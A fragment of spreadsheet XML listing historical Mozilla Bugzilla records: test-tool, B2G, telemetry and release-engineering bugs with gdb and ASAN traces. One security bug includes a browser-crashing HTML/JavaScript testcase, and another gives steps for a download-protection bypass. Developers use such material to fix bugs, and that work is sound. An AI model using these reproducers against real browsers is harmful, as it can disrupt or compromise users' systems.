        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3255" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3255" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3255" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3255" t="inlineStr"/>
      <c r="Q3255" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3255" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3255" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3255" t="n">
        <v>1</v>
      </c>
      <c r="U3255" t="n">
        <v>0</v>
      </c>
      <c r="V3255" t="n">
        <v>2</v>
      </c>
      <c r="W3255" t="inlineStr">
        <is>
          <t>**Request Description** 
(What question are you trying to answer?)
Getting the content for Humans and Foxes formatted, fixing some bugs with the audience feature, testing the system 
**Deadline** 
(Is there a specific date you need the results by? FYI - We may not be able to meet this deadline.) 
Sept 30, 2019
**Priority Level** 
(1 = High 2 = Medium, 3 = Low):
1 
**Priority Level Description** 
(Please provide information on how you chose the priority level above, which product management OKR(s) this work supports, or any other details that will help us triage and prioritize this request.) 
**Supporting Information**
(Links to any assets or previous research relevant to this project.)</t>
        </is>
      </c>
      <c r="X3255" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3256">
      <c r="A3256" t="n">
        <v>1376036</v>
      </c>
      <c r="B3256" t="inlineStr">
        <is>
          <t>2017-06-23 16:05:08 -0700</t>
        </is>
      </c>
      <c r="C3256" t="inlineStr">
        <is>
          <t>Application Reputation checks don't cover blob: and data: URLs</t>
        </is>
      </c>
      <c r="D3256" t="inlineStr">
        <is>
          <t>2018-02-01 17:25:25 -0800</t>
        </is>
      </c>
      <c r="E3256" t="n">
        <v>1</v>
      </c>
      <c r="F3256" t="n">
        <v>1</v>
      </c>
      <c r="G3256" t="n">
        <v>3</v>
      </c>
      <c r="H3256" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3256" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3256" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K3256" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3256" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3256" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3256" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3256" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3256" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3256" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3256" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T3256" t="n">
        <v>1</v>
      </c>
      <c r="U3256" t="n">
        <v>0</v>
      </c>
      <c r="V3256" t="n">
        <v>27</v>
      </c>
      <c r="W3256" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Download content.exe from https://testsafebrowsing.appspot.com/ (#2 under "Desktop Download Warnings") and unblock the file.
2. Upload it on https://p2p.dev.lcip.org/
3. Copy and paste the resulting sharing link into the URL bar and click the download button.
Expected:
The file is blocked by download protection. (Chrome does this)
Actual:
The file is not blocked.
This issue was discussed publicly on https://github.com/mozilla/something-awesome/issues/90 but without identifying it as a client bug.
We should also think about how we should handle these schemes (if at all):
- data: problematic since a remote lookup would send the content to Google (since the content is in the URL)
- filesystem: ???
- about: skip?
- javascript: skip?</t>
        </is>
      </c>
      <c r="X3256" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3257">
      <c r="A3257" t="n">
        <v>426464</v>
      </c>
      <c r="B3257" t="inlineStr">
        <is>
          <t>2008-04-01 18:36:39 -0700</t>
        </is>
      </c>
      <c r="C3257" t="inlineStr">
        <is>
          <t>Loosing the entire Test Plan text when cloning</t>
        </is>
      </c>
      <c r="D3257" t="inlineStr">
        <is>
          <t>2008-04-03 16:05:55 -0700</t>
        </is>
      </c>
      <c r="E3257" t="n">
        <v>1</v>
      </c>
      <c r="F3257" t="n">
        <v>1</v>
      </c>
      <c r="G3257" t="n">
        <v>4</v>
      </c>
      <c r="H3257" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3257" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J3257" t="inlineStr">
        <is>
          <t>Cloning</t>
        </is>
      </c>
      <c r="K3257" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="L3257" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3257" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3257" t="inlineStr"/>
      <c r="Q3257" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3257" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3257" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3257" t="n">
        <v>0</v>
      </c>
      <c r="U3257" t="n">
        <v>0</v>
      </c>
      <c r="V3257" t="n">
        <v>2</v>
      </c>
      <c r="W3257" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Build Identifier: 
Loosing the entire Test Plan text when cloning
Reproducible: Always
Steps to Reproduce:
1. Select existing test plan with the text within Plan document
2.Clone Test Plan with the option Copy plan document selected
Actual Results:  
Text for the new version is lost. The only message within the Plan Document is like "HASH(0x90e034c)"</t>
        </is>
      </c>
      <c r="X3257" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3258">
      <c r="A3258" t="n">
        <v>964462</v>
      </c>
      <c r="B3258" t="inlineStr">
        <is>
          <t>2014-01-27 13:51:47 -0800</t>
        </is>
      </c>
      <c r="C3258" t="inlineStr">
        <is>
          <t>B2G FTU crash when accessing e.me privacy page (after opening marketplace privacy page)</t>
        </is>
      </c>
      <c r="D3258" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:13 -0800</t>
        </is>
      </c>
      <c r="E3258" t="n">
        <v>1</v>
      </c>
      <c r="F3258" t="n">
        <v>1</v>
      </c>
      <c r="G3258" t="n">
        <v>3</v>
      </c>
      <c r="H3258" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3258" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3258" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3258" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3258" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3258" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3258" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3258" t="inlineStr">
        <is>
          <t>[b2g-crash], [systemsfe][adv-main28+]</t>
        </is>
      </c>
      <c r="Q3258" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3258" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3258" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T3258" t="n">
        <v>1</v>
      </c>
      <c r="U3258" t="n">
        <v>0</v>
      </c>
      <c r="V3258" t="n">
        <v>38</v>
      </c>
      <c r="W3258" t="inlineStr">
        <is>
          <t>I still get a consistent crash when I access e.me after I wipe the phone with make reset-gaia. current gaia and gecko trunk.
STR:
make reset-gaia
enable data connection
choose wifi (mozilla guest in my case)
click on privacy link
open b2g privacy page,
open marketplace privacy page,
open e.me privacy page.
Seems like cleaning the marketplace appcache is having problems during cycle collection: https://marketplace.firefox.com/manifest.appcache?repo=fireplace
On my nexus 4 with debug gecko I could catch it in gdb:
Program received signal SIGSEGV, Segmentation fault.
0xb4ca1a6e in nsCOMPtr&lt;nsIFile&gt;::~nsCOMPtr (this=0xb037fc3c, 
    __in_chrg=&lt;optimized out&gt;) at ../../../xpcom/glue/nsCOMPtr.h:517
517	            NSCAP_RELEASE(this, mRawPtr);
(gdb) bt
#0  0xb4ca1a6e in nsCOMPtr&lt;nsIFile&gt;::~nsCOMPtr (this=0xb037fc3c, 
    __in_chrg=&lt;optimized out&gt;) at ../../../xpcom/glue/nsCOMPtr.h:517
#1  0xb555f500 in nsDOMOfflineResourceList::~nsDOMOfflineResourceList (
    this=0xb037fbe0, __in_chrg=&lt;optimized out&gt;)
    at ../../../../dom/src/offline/nsDOMOfflineResourceList.cpp:96
#2  0xb555f564 in nsDOMOfflineResourceList::~nsDOMOfflineResourceList (
    this=0xb037fbe0, __in_chrg=&lt;optimized out&gt;)
    at ../../../../dom/src/offline/nsDOMOfflineResourceList.cpp:96
#3  0xb53d48e2 in nsTransactionManager::DeleteCycleCollectable (
    this=&lt;optimized out&gt;)
    at ../../../../editor/txmgr/src/nsTransactionManager.cpp:58
#4  0xb5172a76 in nsDOMEventTargetHelper::cycleCollection::DeleteCycleCollectable (this=&lt;optimized out&gt;, p=0xb037fbe0)
    at ../../dist/include/nsDOMEventTargetHelper.h:58
#5  0xb4cbbe54 in SnowWhiteKiller::~SnowWhiteKiller (this=0xbee75cfc, 
    __in_chrg=&lt;optimized out&gt;) at ../../../xpcom/base/nsCycleCollector.cpp:2309
#6  0xb4cbbece in nsCycleCollector::FreeSnowWhite (this=0xb3e7d000, 
    aUntilNoSWInPurpleBuffer=&lt;optimized out&gt;)
    at ../../../xpcom/base/nsCycleCollector.cpp:2457
#7  0xb5405a0a in AsyncFreeSnowWhite::Run (this=0xb33e7640)
    at ../../../../js/xpconnect/src/XPCJSRuntime.cpp:209
#8  0xb4ceeaaa in ProcessNextEvent (result=0xbee75da7, 
    mayWait=&lt;optimized out&gt;, this=0xb3e2f600)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at ../../../xpcom/threads/nsThread.cpp:637
#9  nsThread::ProcessNextEvent (this=0xb3e2f600, mayWait=&lt;optimized out&gt;, 
    result=0xbee75da7) at ../../../xpcom/threads/nsThread.cpp:568
#10 0xb4ca9048 in NS_ProcessNextEvent (thread=0xb3e2f600, 
    mayWait=&lt;optimized out&gt;) at ../../../xpcom/glue/nsThreadUtils.cpp:263
#11 0xb4e86c70 in mozilla::ipc::MessagePump::Run (this=0xb3e01b80, 
    aDelegate=0xbee75f00) at ../../../ipc/glue/MessagePump.cpp:95
#12 0xb4e7892a in MessageLoop::RunInternal (this=0xbee75f00)
    at ../../../ipc/chromium/src/base/message_loop.cc:226
#13 0xb4e78942 in RunHandler (this=0xbee75f00)
    at ../../../ipc/chromium/src/base/message_loop.cc:219
#14 MessageLoop::Run (this=0xbee75f00)
    at ../../../ipc/chromium/src/base/message_loop.cc:193
#15 0xb53caaca in nsBaseAppShell::Run (this=0xb316a9c0)
    at ../../../widget/xpwidgets/nsBaseAppShell.cpp:157
#16 0xb5c3e36e in XRE_RunAppShell ()
    at ../../../toolkit/xre/nsEmbedFunctions.cpp:679
#17 0xb4e86d6e in mozilla::ipc::MessagePumpForChildProcess::Run (
    this=0xb3e01b80, aDelegate=0xbee75f00)
    at ../../../ipc/glue/MessagePump.cpp:253
#18 0xb4e7892a in MessageLoop::RunInternal (this=0xbee75f00)
    at ../../../ipc/chromium/src/base/message_loop.cc:226
#19 0xb4e78942 in RunHandler (this=0xbee75f00)
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
    at ../../../ipc/chromium/src/base/message_loop.cc:219
#20 MessageLoop::Run (this=0xbee75f00)
    at ../../../ipc/chromium/src/base/message_loop.cc:193
#21 0xb5c3e252 in XRE_InitChildProcess (aArgc=5, aArgv=&lt;optimized out&gt;, 
    aProcess=&lt;optimized out&gt;) at ../../../toolkit/xre/nsEmbedFunctions.cpp:516
#22 0x0000876e in main (argc=6, argv=0xbee769f4)
    at ../../../ipc/app/MozillaRuntimeMain.cpp:137
(gdb) p this
$1 = (nsCOMPtr&lt;nsIFile&gt; * const) 0xb037fc3c
(gdb) p *this
$2 = {mRawPtr = 0xb037f9b0}
(gdb) up
#1  0xb555f500 in nsDOMOfflineResourceList::~nsDOMOfflineResourceList (
    this=0xb037fbe0, __in_chrg=&lt;optimized out&gt;)
    at ../../../../dom/src/offline/nsDOMOfflineResourceList.cpp:96
96	}
(gdb) p this
$3 = (nsDOMOfflineResourceList * const) 0xb037fbe0
(gdb) p *this
$4 = {&lt;nsDOMEventTargetHelper&gt; = {
    &lt;mozilla::dom::EventTarget&gt; = {&lt;nsIDOMEventTarget&gt; = {&lt;nsISupports&gt; = {
          _vptr.nsISupports = 0xb6bbdf80}, &lt;No data fields&gt;}, &lt;nsWrapperCache&gt; = {_vptr.nsWrapperCache = 0xb6bbe07c, 
        mWrapper = {&lt;js::HeapBase&lt;JSObject*&gt;&gt; = {&lt;No data fields&gt;}, 
          ptr = 0x0}, mFlags = 2}, &lt;No data fields&gt;}, mRefCnt = {
      mRefCntAndFlags = 5}, _mOwningThread = {mThread = 0xb3e2e080}, 
    static _cycleCollectorGlobal = {
    &lt;nsXPCOMCycleCollectionParticipant&gt; = {&lt;nsScriptObjectTracer&gt; = {&lt;nsCycleCollectionParticipant&gt; = {_vptr.nsCycleCollectionParticipant = 0xb6bb73a0, 
            mMightSkip = true}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, mListenerManager = {mRawPtr = 0x0}, mParentObject = 0x0, 
    mOwnerWindow = 0x0, 
    mHasOrHasHadOwnerWindow = true}, &lt;nsIDOMOfflineResourceList&gt; = {&lt;nsISupports&gt; = {
      _vptr.nsISupports = 0xb6bbe088}, &lt;No data fields&gt;}, &lt;nsIObserver&gt; = {&lt;nsISupports&gt; = {
      _vptr.nsISupports = 0xb6bbe100}, &lt;No data fields&gt;}, &lt;nsIOfflineCacheUpdateObserver&gt; = {&lt;nsISupports&gt; = {
      _vptr.nsISupports = 0xb6bbe118}, &lt;No data fields&gt;}, 
    &lt;nsSupportsWeakReference&gt; = {&lt;nsISupportsWeakReference&gt; = {&lt;nsISupports&gt; = {_vptr.nsISupports = 0xb6bbe134}, &lt;No data fields&gt;}, mProxy = 0xb04cb5e0}, 
  static _cycleCollectorGlobal = {&lt;nsDOMEventTargetHelper::cycleCollection&gt; = {&lt;---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---
nsXPCOMCycleCollectionParticipant&gt; = {&lt;nsScriptObjectTracer&gt; = {&lt;nsCycleCollectionParticipant&gt; = {_vptr.nsCycleCollectionParticipant = 0xb6bbe150, 
            mMightSkip = true}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, mInitialized = true, mManifestURI = {mRawPtr = 
    0xb038a5c0}, mManifestSpec = {&lt;nsACString_internal&gt; = {
      mData = 0xb01c7338 "https://marketplace.firefox.com/manifest.appcache?repo=fireplace", mLength = 64, mFlags = 5}, &lt;No data fields&gt;}, mDocumentURI = {
    mRawPtr = 0xb09b9640}, mApplicationCacheService = {mRawPtr = 0x0}, 
  mAvailableApplicationCache = {mRawPtr = 0x0}, mCacheUpdate = {mRawPtr = 
    0xb037f9b0}, mExposeCacheUpdateStatus = false, mStatus = 1, 
  mCachedKeys = 0x0, mCachedKeysCount = 0, 
  mPendingEvents = {&lt;nsCOMArray_base&gt; = {
      mArray = {&lt;nsTArray_Impl&lt;nsISupports*, nsTArrayInfallibleAllocator&gt;&gt; = {&lt;nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;&gt; = {
            mHdr = 0xb6d1a60c}, &lt;nsTArray_TypedBase&lt;nsISupports*, nsTArray_Impl&lt;nsISupports*, nsTArrayInfallibleAllocator&gt; &gt;&gt; = {&lt;nsTArray_SafeElementAtHelper&lt;nsISupports*, nsTArray_Impl&lt;nsISupports*, nsTArrayInfallibleAllocator&gt; &gt;&gt; = {&lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}}, &lt;No data fields&gt;}}</t>
        </is>
      </c>
      <c r="X3258" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3259">
      <c r="A3259" t="n">
        <v>537739</v>
      </c>
      <c r="B3259" t="inlineStr">
        <is>
          <t>2010-01-04 10:13:47 -0800</t>
        </is>
      </c>
      <c r="C3259" t="inlineStr">
        <is>
          <t>Fix INFO string parsing for xpcshell test log files</t>
        </is>
      </c>
      <c r="D3259" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3259" t="n">
        <v>1</v>
      </c>
      <c r="F3259" t="n">
        <v>1</v>
      </c>
      <c r="G3259" t="n">
        <v>5</v>
      </c>
      <c r="H3259" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3259" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3259" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3259" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3259" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3259" t="inlineStr"/>
      <c r="Q3259" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3259" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3259" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3259" t="n">
        <v>1</v>
      </c>
      <c r="U3259" t="n">
        <v>0</v>
      </c>
      <c r="V3259" t="n">
        <v>19</v>
      </c>
      <c r="W3259" t="inlineStr">
        <is>
          <t>jmaher hit this issue on try server. The logs for his xpcshell tests came back looking like this:
INFO | Result summary:
    INFO | Passed: 725
    INFO | Failed: 0
The leading space was not parsed correctly by buildbot, so it got marked as T-FAIL.
Patch coming up.</t>
        </is>
      </c>
      <c r="X3259" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3260">
      <c r="A3260" t="n">
        <v>1411044</v>
      </c>
      <c r="B3260" t="inlineStr">
        <is>
          <t>2017-10-23 14:00:44 -0700</t>
        </is>
      </c>
      <c r="C3260" t="inlineStr">
        <is>
          <t>Beta crash with Telemetry iOS: UInt64 casting negative val</t>
        </is>
      </c>
      <c r="D3260" t="inlineStr">
        <is>
          <t>2017-10-24 14:43:22 -0700</t>
        </is>
      </c>
      <c r="E3260" t="n">
        <v>1</v>
      </c>
      <c r="F3260" t="n">
        <v>1</v>
      </c>
      <c r="G3260" t="n">
        <v>2</v>
      </c>
      <c r="H3260" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3260" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3260" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K3260" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3260" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3260" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3260" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3260" t="inlineStr"/>
      <c r="Q3260" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3260" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3260" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3260" t="n">
        <v>1</v>
      </c>
      <c r="U3260" t="n">
        <v>0</v>
      </c>
      <c r="V3260" t="n">
        <v>6</v>
      </c>
      <c r="W3260" t="inlineStr">
        <is>
          <t>Crash report:
https://sentry.prod.mozaws.net/operations/firefox-ios-beta/issues/674580/
Also filed here
https://github.com/mozilla-mobile/telemetry-ios/issues/68</t>
        </is>
      </c>
      <c r="X3260" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3261">
      <c r="A3261" t="n">
        <v>1340127</v>
      </c>
      <c r="B3261" t="inlineStr">
        <is>
          <t>2017-02-16 05:03:48 -0800</t>
        </is>
      </c>
      <c r="C3261" t="inlineStr">
        <is>
          <t>SEGV in ClearBidiControls</t>
        </is>
      </c>
      <c r="D3261" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:24 -0700</t>
        </is>
      </c>
      <c r="E3261" t="n">
        <v>1</v>
      </c>
      <c r="F3261" t="n">
        <v>1</v>
      </c>
      <c r="G3261" t="n">
        <v>3</v>
      </c>
      <c r="H3261" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3261" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3261" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K3261" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3261" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3261" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3261" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3261" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q3261" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3261" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3261" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T3261" t="n">
        <v>1</v>
      </c>
      <c r="U3261" t="n">
        <v>0</v>
      </c>
      <c r="V3261" t="n">
        <v>30</v>
      </c>
      <c r="W3261" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox. The testcase seems to depend on the browser window size. Try resizing the window if it does not crash on the first attempt.
&lt;script&gt;
function start() {
        o22=document.createElement('frame');
        o38=document.createElement('frame');
        o47=document.createElement('frame');
        o65=document.createElement('style');
        o22.style.writingMode='sideways-lr';
        o74=document.createTextNode('{}:first-line{');
        o65.appendChild(o74);
        o83=document.createElement('frame');
        o47.animate([{unicodeBidi: 'embed',}],100);
        o100=document.documentElement;
        document.documentElement.prepend(unescape('%u0627'),undefined);
        o83.prepend("undefined","undefined",unescape("undefined%u8A08%u7B97%u3057%u30E5%u30FC%u30BF%u30FC%u8A08%u7B97%u3057%u30E5%u30FC%u30BF%u30FC%u8A08%u7B97%u3057%u30E5%u30FC%u30BF%u30FC"));
        document.write('&lt;html&gt;&lt;body&gt;&lt;/body&gt;&lt;/html&gt;');
        document.documentElement.appendChild(o22);
        o22.appendChild(o38);
        o38.appendChild(o47);
        document.documentElement.appendChild(o65);
        o47.appendChild(o83);
        o22.appendChild(o100);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN:DEADLYSIGNAL
=================================================================
==7498==ERROR: AddressSanitizer: SEGV on unknown address 0x7ffe2c663d6c (pc 0x7faa7b918d7a bp 0x7ffc2c663c90 sp 0x7ffc2c6638e0 T0)
    #0 0x7faa7b918d79 in ClearBidiControls /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:313:21
    #1 0x7faa7b918d79 in ResolveParagraphWithinBlock /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:1226
    #2 0x7faa7b918d79 in nsBidiPresUtils::TraverseFrames(nsBlockFrame*, nsBlockInFlowLineIterator*, nsIFrame*, BidiParagraphData*) /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:1192
    #3 0x7faa7b917566 in nsBidiPresUtils::Resolve(nsBlockFrame*) /home/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:697:5
    #4 0x7faa7bac2e0b in ResolveBidi /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:7452:10
    #5 0x7faa7bac2e0b in nsBlockFrame::GetMinISize(nsRenderingContext*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:736
    #6 0x7faa7bb3cbd0 in ShrinkWidthToFit /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:5529:22
    #7 0x7faa7bb3cbd0 in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:942
    #8 0x7faa7bb4408e in nsFrame::ComputeSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&amp;, int, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, mozilla::LogicalSize const&amp;, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:4785:24
    #9 0x7faa7ba8456e in mozilla::ReflowInput::InitConstraints(nsPresContext*, mozilla::LogicalSize const&amp;, nsMargin const*, nsMargin const*, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2451:9
    #10 0x7faa7ba7af04 in mozilla::ReflowInput::Init(nsPresContext*, mozilla::LogicalSize const*, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:399:3
    #11 0x7faa7ba43759 in emplace&lt;nsPresContext *&amp;, const mozilla::ReflowInput &amp;, nsIFrame *&amp;, mozilla::LogicalSize &amp;&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/Maybe.h:461:29
    #12 0x7faa7ba43759 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, mozilla::ReflowOutput*, bool&amp;) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:879
    #13 0x7faa7baee855 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4151:3
    #14 0x7faa7baed528 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3952:5
    #15 0x7faa7bae3e4c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&amp;, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3826:9
    #16 0x7faa7bad3223 in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2832:5
    #17 0x7faa7bad3223 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2368
    #18 0x7faa7bac98e2 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #19 0x7faa7bb2ccc0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #20 0x7faa7bb2b6a2 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, unsigned int&amp;) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
    #21 0x7faa7bb2ccc0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&amp;, mozilla::ReflowInput const&amp;, mozilla::WritingMode const&amp;, mozilla::LogicalPoint const&amp;, nsSize const&amp;, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #22 0x7faa7bbd02ea in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
